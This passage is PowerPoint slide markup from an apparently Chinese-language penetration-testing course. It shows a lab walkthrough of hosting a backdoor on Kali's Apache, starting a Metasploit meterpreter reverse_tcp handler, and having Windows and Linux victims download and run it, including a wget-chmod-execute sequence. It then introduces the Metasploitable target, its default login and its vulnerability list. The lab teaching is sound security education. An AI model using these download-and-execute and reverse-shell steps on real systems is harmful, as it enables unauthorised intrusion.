                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>systemctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t> start apache2 #kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>自带 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>apache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>服务器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t> 在 MSF 上启动 handler 开始监听后门程序</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>打开 win7 访问 Kali 搭建的 Web 服务下载执行文件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>打开浏览器访问： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://192.168.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>77</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>128</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>update</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>.exe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>因</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>apache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>服务显示的地址默认为 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>/var/www/html, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>不启动无法浏览器下载软件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{180D397E-9970-174F-4BD8-B0FFBD881486}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="680119" y="5050546"/>
            <a:ext cx="10831761" cy="1650553"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19368960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30A4CAB-8B9A-CC48-D46A-E75BEBF3E6FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{42B5DE06-5D0F-4F48-9101-6465FFBD63EE}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>55</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3A0D4A0-63F3-83D4-4ED8-CFEF19563ACF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760839" y="1847817"/>
            <a:ext cx="10947400" cy="3903954"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>开启</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>apache2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>服务</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>: /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>init.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>/apache2 start</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>3.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>开启监听（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>payload: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>/x64/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>），新建一个终端：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>[root@xuegod63 ~]# wget http://192.168.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>77</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>128</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>/xuegod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>.elf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t> #下载后门</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>添加执行权限并运行</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>root@xuegod63:~# chmod +x xuegod</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>执行程序</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>root@xuegod63:~# ./xuegod</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8853200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74656" y="856357"/>
            <a:ext cx="10776967" cy="5909310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Metasploitable</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Metasploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是一个虚拟靶机系统，里面含有大量未被修复的安全漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，从网上下载解压之后就可以直接使用，不需要自己安装。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>用户名是 ：msfadmin      密码是： msfadmin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>安装：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://zhuanlan.zhihu.com/p/388725815</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Metasploitable2漏洞列表：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1、弱口令漏洞（如vnc、mysql、PostgreSQL等）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2、Samba MS-RPC Shell 命令注入漏洞</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3、Vsftpd源码包后门漏洞</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>4、UnreallRCd后门漏洞</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>5、Linux NFS共享目录配置漏洞</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>6、Java RMI SERVER 命令执行漏洞</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>7、Tomcat管理台默认口令漏洞</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>8、root用户弱口令漏洞（SSH爆破）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>9、Distcc后门漏洞</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>10、Samba sysmlink 默认配置目录遍历漏洞</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>11、PHP CGI参数注入执行漏洞</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
